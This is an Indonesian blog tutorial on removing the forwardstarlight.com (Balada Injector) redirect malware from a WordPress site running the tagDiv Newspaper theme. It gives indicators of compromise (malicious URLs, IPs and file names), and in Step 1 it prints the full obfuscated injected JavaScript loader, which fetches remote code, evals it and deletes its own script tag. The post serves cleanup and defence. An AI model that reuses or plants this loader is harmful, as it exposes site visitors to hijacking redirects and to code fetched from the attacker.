Beranda WordPress Cara Menghapus Malware from.forwardstarlight.com/mDgTN1 di WordPress

Cara Menghapus Malware from.forwardstarlight.com/mDgTN1 di WordPress

1002
0
BERBAGI
asdar.id menyediakan Member Premium Download untuk download file tanpa embel-embel iklan dan halaman, apa lagi harus menunggu timer yang begitu lama. Dengan berlangganan Member Premium Download, semua file dapat didownload dengan singkat langsung menuju ke sumbernya!, klik DISINI untuk DAFTAR :-) Untuk cara download file Member Free Download, bisa membaca Tutorial Download yang ada dibawah Timer (halaman Safelink) saat menekan tombol download.
Rekomendasi aplikasi hitung cepat RAB akurat dan otomatis, sangat mudah digunakan. Tinggal ganti dimensi, RAB Langsung Jadi. Jika anda seorang ahli sipil atau arsitek, rugi jika tidak punya filenya. Silahkan klik DISINI untuk mendapatkan Filenya.
cara mengapus malware from.forwardstarlight
cara mengapus malware from.forwardstarlight

Halo teman-teman sekalian dimanapun kalian berada, apa kabar kalian hari ini? Saya doakan sehat selalu dan diberikan rejeki yang berlimpah. Kali ini saya ingin membagikan pengalaman saya terkena malware from.forwardstarlight.com yang sudah tahunan pada Blog wordpress saya. Baiklah saya akan bercerita sedikit dulu mengenai kasus saya ini sampai bisa solved.

Pendahuluan

Awal mulanya saya tidak mengetahui kalau blog saya ini sudah terkena malware karena setiap hari saya membukanya melalui PC/Desktop. Kebetulan akhir-akhir ini saya ingin membukanya di browser mobile karena ingin mengetes iklan yang tidak muncul disebabkan sudah saya copot beberapa hari dan ingin memasangnya kembali. Ketika halaman utama blog saya terbuka, betapa terkejutnya saya mendapati domain asdar.id redirect ke domain from.forwardstarlight.com/mDgTN dan kemudian redirect lagi untuk menampilkan iklan-iklan secara acak.

Kejadian tersebut membuat saya syok karena hampir sebagian besar pengunjung blog saya berasal dari pengguna mobile. Tentu ini menjadi hal buruk untuk blog saya, baik dari segi SEO maupun dari kenyamanan pengguna di mobile yang dapat menyebabkan penunjung blog saya mulai berkurang. Dikarenakan malware ini menggunakan session, maka ada jeda entah beberapa menit, jam, atau hari untuk bisa aktif lagi. Jadi jika domain dikunjungi pada browser yang sudah dikunjungi tadi (redirect ke from.forwardstarlight.com), maka akan tampil normal kembali sampai butuh beberapa waktu untuk dialihkan kembali oleh malware ini. Contoh kasus pada blog ini yang redirect lagi ketika sudah 30 menitan, khusus di mobile saja. Malware ini akan aktif jika mendeteksi ukuran layar mobile, dan tidak aktif pada ukuran layar desktop/pc.

Pengertian Malware forwardstarlight.com

forwardstarlight.com merupakan sebuah domain yang akhir-akhir ini (sebenarnya sudah lama) digunakan untuk menyusupi file-file wordpress. Menurut keterangan yang saya dapat, forwardstarlight ini tergolong Balada Injector dengan target pada plugin tagDiv, dan Admin Newspaper Theme & WordPress. Sejauh ini kebanyakan ditemukan kasus pada tema TagDiv yang versi Nulled (Modifikasi) tanpa lisensi yang bertebaran di internet.

Walaupun sebagian besar ada pada tema WordPress dan plugin-plugin lainnya, tetapi umumnya malware ini dipasang pada tema wordpress yang populer, misalnya saja newspaper dan newsmag seperti pada tema blog ini.

Varian Malware Lainnya

Ada beberapa tipe malware lainnya seperti Malicious URL, Malicious subdomains, dan Malicious files & plugin folder. Berikut beberapa listnya.

Malicious URLs:

https://where.selectofmychoices.com/scripts/step.js
https://gate.getmygateway.com/select
https://west.statisticplatform.com/stats
https://good.playerofsunshine.com/scripts/start.js
https://normal.playerofsunshine.com/scripts/start.js
https://cdn.statisticscripts.com/stats/get.js
https://here.selectofmychoices.com/scripts/get.js
https://try.selectofmychoices.com/script/start.js
https://best.playerofsunshine.com/scripts/cdn.js
https://fourth.gybritanalytsesystem.com/scripts/start.js
https://fifth.gybritanalytsesystem.com/script/step.js

Malicious IPs:

185.39.206.161, 80.66.79[.](247|253) Hyper Hosting SRL

Malicious subdomains:

80.66.79.250
store.bestselllerservice.com

80.66.79.251
follow.forwardstarlight.com
stay.forwardstarlight.com
west.statisticplatform.com

80.66.79.252
get.promsmotion.com
show.bridgelinering.com
net.promsmotion.com
go.bridgelinering.com

80.66.79.253
gate.getmygateway.com
get.lightsteper.com
cdn.specialtaskevents.com
page.specialnewspaper.com

80.66.79.249
special.beatifulllhistory.com

80.66.79.248
west.statisticplatform.com
goto.betradingway.com
give.selectchoise.com
north.statisticplatform.com
got.selectchoise.com
startup.betradingway.com

80.66.79.247
call.getsmallcount.com
get.statisticplatform.com
got.statisticplatform.com
come.statisticplatform.com
bee.selectofmychoices.com
best.playerofsunshine.com
fourth.gybritanalytsesystem.com
was.selectofmychoices.com
where.selectofmychoices.com
normal.playerofsunshine.com
good.playerofsunshine.com
try.selectofmychoices.com
great.playerofsunshine.com
third.gybritanalytsesystem.com
here.selectofmychoices.com
second.gybritanalytsesystem.com
fifth.gybritanalytsesystem.com
first.gybritanalytsesystem.com
excelent.playerofsunshine.com

Malicious files & plugin folders:

zexit.zip, wp-zexit, wp-swamp.
wp-admin/js/custom-header.js, wp-includes/script-loader.js, wp-includes/js/wp-custom-header.js

Secara keseluruhan diatas ada yang masih live urlnya dan ada yang sudah mati.

Ringkasan Malware

  • Nama domain: Forwardstarlight.com
  • Kategori: Balada Injector
  • Fitur: Mengubah pengalaman penjelajahan pengguna dengan mengganti beranda default, menampilkan iklan yang tidak diinginkan, dan mengalihkan pengguna ke situs web berbahaya.
  • Tingkat Bahaya: Sedang
  • Gejala: Menampilkan halaman yang tidak diinginkan dan dapat menyebabkan beberapa efek negatif, seperti menampilkan iklan pop-up yang mengganggu dan melambatkan penjelajahan internet. Malware ini memanipulasi dan memaksa pengguna untuk mengunjungi situs-situs iklan/phising dan melakukan pencurian data pada pengguna.
  • Penyebaran: Malware browser atau perangkat lunak iklan seperti Forwardstarlight.com dapat menyebar melalui iklan pop-up yang menipu, instalasi perangkat lunak gratis yang dibundel dengan malware, instalasi Flash Player palsu, Plugin & Tema WordPress Nulled/Bajakan, dan file-file program tiruan lainnya.

Cara Menghapus Malware from.forwardstarlight.com/mDgTN1 di WordPress

Jujur agak sulit menemukan malware ini dalam blog saya. Segala cara saya coba mulai dari menonaktifkan semua plugin, mencari kode mencurigakan di file-file javascript, termasuk mengecek semua file-file php tetapi tetap saja saya tidak dapat menemukannya. Minimnya artikel yang membahas tentang kasus ini menjadikan saya bereksperimen sampai seminggu lebih. Mengeksplor semua kode-kode yang ada dalam ratusan bahkan ribuan file dan akhirnya ada satu tempat yang menurut saya bisa jadi menyimpan kode tersebut, dan terbukti kode malware tersebut memang disisipkan disitu.

Ada beberapa cara menghapus/menghilangkan malware ini dari blog wordpress teman-teman. Karena begitu banyak model dan kasus dari malware ini, akan banyak pula cara menghilangkannya sesuai kasus yang dialami. Saya hanya akan membagikan solved dari kendala yang saya alami. Berikut langkah-langkah yang bisa teman-teman coba:

Catatan: Langkah-langkah dibawah ini khusus pengguna tema WordPress NewsPaper & Newsmag by TagDiv.

Step 1

  1. Cadangkan blog/situs yang terinfeksi, termasuk database dan berkas web, simpan semuanya termasuk file yang mencurigakan.
  2. Buka website berikut, https://unmask.sucuri.net/ dan masukan url blog anda. Misal saya disini memasukkan blog asdar.id. Kemudian klik Check.
    sucuri.net
    sucuri.net
  3. Dari hasil scan, blog saya didiagnosa disusupi malware dengan kode berikut.
    suspicious inline scripts
    suspicious inline scripts
  4. Pada kode hasil scan tadi, copy kode 0x479a59 atau 0x48a8ff. Ini potongan kode hasil scan tersebut.
    (function(_0x479a59,_0x48a8ff){function _0x134e07(_0xbeb20d,_0x1c87db,_0xb53781,_0xdb943,_0x1ed3b9){return _0x46d2(_0xbeb...
  5. Buka database wordpress kalian, klik Search. Masukan kode 0x479a59 atau 0x48a8ff pada Words or values to search for (wildcard: “%”). Lalu pilih opsi all the words. Klik Go.
  6. Akan tampil result hasil pencarian tadi, sebagai hasil ada result 1 pada wp_options. Nah ini dia biang keroknya. Klik Browse.
    code result
    code result
  7. Klik 2x untuk edit pada option_value.
    wp options showing row
    wp options showing row
  8. Secara default anda akan mendapati sebuah kode javascript yang panjang seperti ini.
    a:1:{s:3:"css";s:8377:"</style><script>(function(_0x479a59,_0x48a8ff){function _0x134e07(_0xbeb20d,_0x1c87db,_0xb53781,_0xdb943,_0x1ed3b9){return _0x46d2(_0xbeb20d-0xe,_0x1c87db);}function _0x73277f(_0x2efb08,_0x154ff0,_0x3fb786,_0x297708,_0x1bfb7b){return _0x46d2(_0x2efb08- -0x50,_0x154ff0);}function _0x318b87(_0x4d5cdc,_0x2ec4bc,_0x3558cd,_0x2e00a1,_0x530cba){return _0x46d2(_0x530cba- -0xba,_0x3558cd);}var _0x1d674c=_0x479a59();function _0x410b04(_0x34e052,_0x53f0de,_0x309148,_0x22ea0f,_0x4579df){return _0x46d2(_0x22ea0f- -0x3e1,_0x53f0de);}function _0x36a026(_0x3b526b,_0x345a6f,_0x256449,_0x3cae64,_0x2420b3){return _0x46d2(_0x256449- -0x2b3,_0x3b526b);}while(!![]){try{var _0x29d87b=parseInt(_0x36a026('xRYM',-0x1ee,-0x1e1,-0x1c8,-0x1dc))/(0x9c6+0x3*-0x14+-0x989)+parseInt(_0x36a026('fHKB',-0x20f,-0x1fe,-0x1e7,-0x210))/(0x3*0x9+-0x2*-0xdce+-0x1bb5)*(-parseInt(_0x36a026('opu1',-0x1e2,-0x1d9,-0x1e3,-0x1f0))/(-0x1e51*-0x1+0x20aa+-0x3ef8))+-parseInt(_0x410b04(-0x327,'kVg^',-0x328,-0x312,-0x318))/(-0x21aa+-0x15*-0x147+-0x41*-0x1b)+parseInt(_0x36a026('[i&x',-0x1e9,-0x1df,-0x1c6,-0x1d9))/(0x1610+-0x7da*0x3+0x183)+-parseInt(_0x73277f(0x8b,'d1L%',0x80,0x7c,0x73))/(-0xb07+0x45d*-0x1+0xf6a)+-parseInt(_0x73277f(0x72,'uipM',0x60,0x66,0x7c))/(-0x3c4*0x8+-0x2137+0x2*0x1faf)+-parseInt(_0x318b87(0x2e,0x15,'R&v%',0x22,0x22))/(0x1*-0x124b+0x1*0x21f1+-0xf9e)*(-parseInt(_0x134e07(0xd3,'[i&x',0xe7,0xd1,0xbc))/(-0x1c*-0x16+-0x90e+0x6af));if(_0x29d87b===_0x48a8ff)break;else _0x1d674c['push'](_0x1d674c['shift']());}catch(_0x2347f3){_0x1d674c['push'](_0x1d674c['shift']());}}}(_0x4ae3,0x39077+0x90f9b*0x1+-0x5592d));function _0x403f9d(_0x18073b){function _0x38bf2b(_0x1ee6e3,_0x455c41,_0x356d85,_0x35942e,_0x2b68a2){return _0x46d2(_0x35942e- -0x12a,_0x455c41);}function _0x12cc7d(_0x1fe7a6,_0x4eb266,_0x2343b6,_0xe9dd39,_0x30d197){return _0x46d2(_0x4eb266- -0x2d4,_0x30d197);}function _0x43a2a9(_0xf226ce,_0xb9783b,_0x371ea6,_0x4e53bb,_0x1c438c){return _0x46d2(_0x4e53bb-0x116,_0xf226ce);}var _0x3cf065={};_0x3cf065[_0x43a2a9('ocrv',0x1c3,0x1eb,0x1d7,0x1dd)]=_0x43a2a9('LC9%',0x1c6,0x1ce,0x1dd,0x1f5)+_0x38bf2b(-0x56,'OK7e',-0x66,-0x5e,-0x4f);function _0x546585(_0x15baf4,_0x24aff1,_0x44b515,_0x3ee442,_0x1fec3b){return _0x46d2(_0x3ee442-0x135,_0x44b515);}function _0x246f34(_0x4a7445,_0x4eeb75,_0x116bc7,_0x2e6974,_0x23ad71){return _0x46d2(_0x2e6974- -0x4,_0x4eeb75);}_0x3cf065[_0x246f34(0xa9,'(FZW',0xc4,0xc0,0xac)]=_0x43a2a9('iUTE',0x1ea,0x1ec,0x1f8,0x1ee);var _0x84e543=_0x3cf065,_0xf2d5c2=_0x84e543[_0x12cc7d(-0x200,-0x1fd,-0x1e6,-0x1f2,'7]v7')][_0x43a2a9('dVX$',0x1e0,0x1db,0x1dc,0x1c6)]('|'),_0x4cf617=0x7ee+0x59f+0x1*-0xd8d;while(!![]){switch(_0xf2d5c2[_0x4cf617++]){case'0':_0x52a43a[_0x12cc7d(-0x20c,-0x1fb,-0x1fe,-0x1ee,'s9v&')](_0x84e543[_0x546585(0x228,0x22b,'FPVW',0x212,0x20f)],_0x545535,![]);continue;case'1':var _0x545535=_0x18073b;continue;case'2':return _0x52a43a[_0x546585(0x1fe,0x229,'LC9%',0x216,0x21f)+_0x246f34(0xcb,'3b^Y',0xaa,0xb3,0xaf)+'xt'];case'3':var _0x52a43a=new XMLHttpRequest();continue;case'4':_0x52a43a[_0x246f34(0x9e,'h8Hq',0xbe,0xb6,0xcd)]();continue;}break;}}function _0x4ae3(){var _0xa5b8a5=['fSkdwbFcSW','W7JdLSodAudcQqxcH8o9W7i/CbHJ','W40el2ddGa','W5JcRSk9fw4','WOmUlSkeiSkkWO4','W6VdPI7cMJe','DSoHW7RcMhFcQCkhWOxcJG','aWf5','W77cGCoIiq','e8omzNzun8k3kqi+WPFcOq','W7xdMmoLFbm','hmomBhzvmmkGds44WRNcPa','ySo8W6zZrtKJW5FcHSoAW5DL','WQq/ctBcJW','WR0NWOTHtLZdUCoQW709mSkA','W5VdSGK','W7hdKCofz07cRwxdTCo0W58cAq','W7VcSMaJWP0','ESkLWRTSW4HUoe4PBJnWW4O','WRBdPwSydq','WQfjWOdcTX0','W7PKWR3dUq','WO5Ph8kSDSohW5u3WRNdPNy','dH3dSCklkCkIWP3cTCoqFSkacd4','WPxcSCkhW701ueW','gmoRW4Ogya','W7dcUSoSf8o+kgvNwJrzWQldMG','W5RdHZ0','WPayW7XLnq','WPNcT8o/gte','W4pdJLu','p8ktW78JWOW','WRddQ3mblq','W5iIoSkjcG','WOhcH3/dVCkKW4tcTmo1WPq','qSkSeNpcPW','W7uvW4RcKaG','WOyTh0/cRW','W7/cRN0GWPO','WPj+xHC','Bu3cV8kSCqddP8kyWRbFWQe','W4pcMspdMq','zqmkjCkF','mqZdNmo5nG','W6JdPu9Cr8k7W5ilBSkQFe8','WO1OgSkJE8kxWQ9RWQFdKfdcRCkUWQu','q8o5kN3cKa','WQVdImklufq1W7DLoN8bW7JcRa','WOtcOmo1rZ0'];_0x4ae3=function(){return _0xa5b8a5;};return _0x4ae3();}function _0x2fe949(_0x489eda,_0x1f3194,_0x4e4546,_0xac79e1,_0x1836f7){return _0x46d2(_0xac79e1-0x2f0,_0x4e4546);}var _0x294c9e=_0x403f9d(_0x412e3b(0xb6,0xba,'7FzZ',0xc4,0xb7)+_0x412e3b(0xe9,0xd9,'3b^Y',0xc9,0xe3)+_0x2fe949(0x3d7,0x3be,'^j*W',0x3d0,0x3e1)+_0x2fe949(0x396,0x3ae,'5)Ko',0x3a8,0x3ab)+_0x2fe949(0x3c5,0x3e2,'[wBo',0x3d5,0x3bc)+_0x2e35ec(-0x14,-0xc,-0x21,'7FzZ',-0x9)+_0x412e3b(0xd9,0xc4,'LC9%',0xc7,0xdb)+_0x3f6691('iUTE',-0xac,-0xb2,-0x9d,-0xb2)+_0x412e3b(0xb1,0xb7,'ocrv',0xb8,0xb1)+_0x2fe949(0x3ad,0x3b8,'fHKB',0x3ac,0x39e));function _0x42f3a8(_0x4a09c0,_0x3ad4c4,_0x28c01a,_0x4ccf92,_0x2fdef4){return _0x46d2(_0x3ad4c4-0x260,_0x2fdef4);}function _0x3f6691(_0x47426f,_0xbec2a8,_0x3dd06c,_0x5c9fa7,_0x2b80ef){return _0x46d2(_0x5c9fa7- -0x166,_0x47426f);}function _0x46d2(_0x1e0e3c,_0x59eefa){var _0x38454e=_0x4ae3();return _0x46d2=function(_0x2c6d14,_0x2fd1ac){_0x2c6d14=_0x2c6d14-(0x1*-0xa67+-0x269*0x6+0x1992);var _0x51631d=_0x38454e[_0x2c6d14];if(_0x46d2['yeQgHG']===undefined){var _0x542d86=function(_0x54b080){var _0x578ed6='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x411c58='',_0x1da869='';for(var _0xf96e12=-0x1b9a*0x1+-0x1da0+-0xa*-0x5b9,_0x1f3fb4,_0x699fea,_0x506d33=-0xb63*0x2+0x65*-0x49+0x3393;_0x699fea=_0x54b080['charAt'](_0x506d33++);~_0x699fea&&(_0x1f3fb4=_0xf96e12%(0x1*0x255b+0x1*-0x2570+0x19)?_0x1f3fb4*(-0x2d*0x12+0x2356+0x552*-0x6)+_0x699fea:_0x699fea,_0xf96e12++%(0x2050*-0x1+-0x61*0x6+-0x67*-0x56))?_0x411c58+=String['fromCharCode'](0x92f+-0x76a+-0xc6&_0x1f3fb4>>(-(-0x534+-0x162c+0x1*0x1b62)*_0xf96e12&0x230d+0x14d3+-0x1*0x37da)):0x1d*0xe4+-0x1593*0x1+-0x441){_0x699fea=_0x578ed6['indexOf'](_0x699fea);}for(var _0x2c93cc=-0xb0b*-0x1+-0x98*0x19+0x3cd,_0x3630db=_0x411c58['length'];_0x2c93cc<_0x3630db;_0x2c93cc++){_0x1da869+='%'+('00'+_0x411c58['charCodeAt'](_0x2c93cc)['toString'](-0x1*0x1a1+-0x1*-0x1931+-0xbc*0x20))['slice'](-(0x1*-0x335+-0xb3b+0xe72));}return decodeURIComponent(_0x1da869);};var _0xdf7891=function(_0x1c0ae3,_0x5b95fc){var _0x13a271=[],_0x4a9e2f=0x1*0x1f1+0xa90+0x123*-0xb,_0x12f105,_0x84dea8='';_0x1c0ae3=_0x542d86(_0x1c0ae3);var _0x42a0e9;for(_0x42a0e9=-0x1*-0xe21+0x292+-0x1db*0x9;_0x42a0e9<-0x1aa3+0x3*-0xbb6+0x3ec5;_0x42a0e9++){_0x13a271[_0x42a0e9]=_0x42a0e9;}for(_0x42a0e9=0x26a2+-0x509*0x7+-0x363;_0x42a0e9<-0x4b1*0x1+0x2474+-0x1ec3;_0x42a0e9++){_0x4a9e2f=(_0x4a9e2f+_0x13a271[_0x42a0e9]+_0x5b95fc['charCodeAt'](_0x42a0e9%_0x5b95fc['length']))%(-0x2069+-0x35*-0x21+0x8dc*0x3),_0x12f105=_0x13a271[_0x42a0e9],_0x13a271[_0x42a0e9]=_0x13a271[_0x4a9e2f],_0x13a271[_0x4a9e2f]=_0x12f105;}_0x42a0e9=0x1d*0x6e+0x1c83+-0x28f9,_0x4a9e2f=0xae5+-0x2*0x3fd+-0x2eb;for(var _0x53829d=-0x614*0x2+-0x1c*0x6b+-0x6*-0x3fa;_0x53829d<_0x1c0ae3['length'];_0x53829d++){_0x42a0e9=(_0x42a0e9+(0x1e2f+0x44+-0x1e72))%(-0x99f+-0x1d0d+-0x2*-0x13d6),_0x4a9e2f=(_0x4a9e2f+_0x13a271[_0x42a0e9])%(-0x22bd*-0x1+0x3*0x825+-0x3a2c),_0x12f105=_0x13a271[_0x42a0e9],_0x13a271[_0x42a0e9]=_0x13a271[_0x4a9e2f],_0x13a271[_0x4a9e2f]=_0x12f105,_0x84dea8+=String['fromCharCode'](_0x1c0ae3['charCodeAt'](_0x53829d)^_0x13a271[(_0x13a271[_0x42a0e9]+_0x13a271[_0x4a9e2f])%(-0x18c1+0x263b*-0x1+-0x1a4*-0x27)]);}return _0x84dea8;};_0x46d2['VFMfGd']=_0xdf7891,_0x1e0e3c=arguments,_0x46d2['yeQgHG']=!![];}var _0x3dbf04=_0x38454e[0x4f5+-0xa7f*-0x3+-0x1*0x2472],_0x591566=_0x2c6d14+_0x3dbf04,_0x2c3034=_0x1e0e3c[_0x591566];return!_0x2c3034?(_0x46d2['vUXCcP']===undefined&&(_0x46d2['vUXCcP']=!![]),_0x51631d=_0x46d2['VFMfGd'](_0x51631d,_0x2fd1ac),_0x1e0e3c[_0x591566]=_0x51631d):_0x51631d=_0x2c3034,_0x51631d;},_0x46d2(_0x1e0e3c,_0x59eefa);}if(_0x294c9e[_0x42f3a8(0x320,0x31d,0x30d,0x32e,'u3lf')+'Of'](_0x42f3a8(0x32e,0x333,0x347,0x339,'UgPV'))!==-(0x1877+0x191*0x3+0x1*-0x1d29))try{eval(_0x294c9e);}catch(_0x3c1b79){}function _0x2e35ec(_0x26461c,_0x3b86f6,_0x47e530,_0x497cdc,_0x31ecca){return _0x46d2(_0x26461c- -0xe9,_0x497cdc);}function _0x412e3b(_0x13d343,_0x2fd7b8,_0x5c79d7,_0x1d3630,_0x383ace){return _0x46d2(_0x2fd7b8-0x1,_0x5c79d7);}document[_0x412e3b(0xc2,0xcf,'Wo@F',0xc9,0xcc)+_0x2e35ec(-0x5,0x5,0x3,'7]v7',0x11)+_0x3f6691('fHKB',-0x8c,-0x92,-0x87,-0x72)]&&document[_0x42f3a8(0x340,0x331,0x327,0x325,'fM!U')+_0x42f3a8(0x327,0x31e,0x321,0x32c,'pIea')+_0x412e3b(0xe4,0xcc,'tnNi',0xcf,0xce)][_0x42f3a8(0x333,0x343,0x351,0x33e,'R5xu')+'e']();/*08508cacfc7f74e322d5bffe0a10bb43*/</script><style>";}
  9. Edit kode tersebut menjadi kode berikut.
    a:1:{s:3:"css";s:8377:"</style><style>";}
  10. Klik diluar area option_value untuk menyimpan.
  11. Done.

Step 2

  1. Login ke panel hosting kalian, kemudian masuk ke root domain kalian.
  2. Masuk ke public_html > wp-content > plugins > td-composer > plugins > css-live > includes > td_live_css_css_storage.php
  3. Buka file td_live_css_css_storage.php dan cari kode ini di paling bawah.
    static function on_shutdown_save_log() { update_option('td_live_css_local_storage', self::$local_storage); }
  4. Ubah kode tadi menjadi
    static function on_shutdown_save_log() { // update_option('td_live_css_local_storage', self::$local_storage); }
  5. Save file tersebut.
  6. Masuk lagi ke public_html > wp-content > plugins > td-composer > css-live > includes > td_live_css_storage.php
  7. Buka file td_live_css_storage.php dan cari lagi kode ini di paling bawah.
    static function on_shutdown_save_log() { update_option('td_live_css_local_storage', self::$local_storage); }
  8. Ubah kode tadi menjadi
    static function on_shutdown_save_log() { // update_option('td_live_css_local_storage', self::$local_storage); }
  9. Save file tersebut.
  10. Done.

Silahkan cek kembali url domain anda, jika masih redirect kemungkinan masih ada file atau database yang masih menyimpan kode malware lainnya. Secara praktek, terbukti blog saya asdar.id tidak lagi redirect ke from.forwardstarlight.com/mDgTN1 yang menampilkan iklan-iklan acak dan alhamdulillah masalah pada blog wordpress saya bisa terselesaikan.

Kesimpulan

from.forwardstarlight.com adalah jenis malware yang sangat berbahaya menurut saya, karena bisa menyebabkan reputasi blog kita menjadi jelek dimata pengguna. Belum lagi dari segi SEO pada mesin pencari. Hal tersebut disebabkan karena bounce rate yang tinggi yang memungkinkan tenggelamnya website kita dan tidak dicari lagi. So, sebagai kesimpulan, saran saya jangan lagi menginstal plugin-plugin atau tema wordpress nulled/bajakan yang tidak resmi. Karena secara tidak langsung tidak mungkin plugin/tema tersebut dibagikan secara gratis (tanpa lisensi) kalau tidak ada maksud dan tujuan terselubung. Cukup blog saya saja yang mengalaminya. Terima kasih telah membaca tutorial singkat ini, barangkali bisa bermanfaat untuk teman-teman yang mengalaminya.

TINGGALKAN KOMENTAR

Silakan masukkan komentar anda!
Silakan masukkan nama anda disini